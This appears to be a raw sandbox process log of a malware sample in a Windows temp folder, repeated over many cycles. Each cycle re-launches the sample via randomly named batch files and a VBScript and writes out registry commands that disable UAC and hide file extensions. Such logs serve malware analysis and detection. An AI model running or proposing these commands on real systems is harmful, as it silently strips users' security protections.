reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xOkkAsIM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BMggQgME.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KKkIkgYs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GoEsoYMk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UWkocwAI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OqEoIUow.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BiswsQYc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xmcIIwII.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pMQkUswo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aqYYsUAM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YSUkIwoE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KokQcgAo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIEkUAIQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RwcEkUsk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUIkMckA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nwgUIEMA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YgQkQIIo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eCEIYMYY.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sacAQoEE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

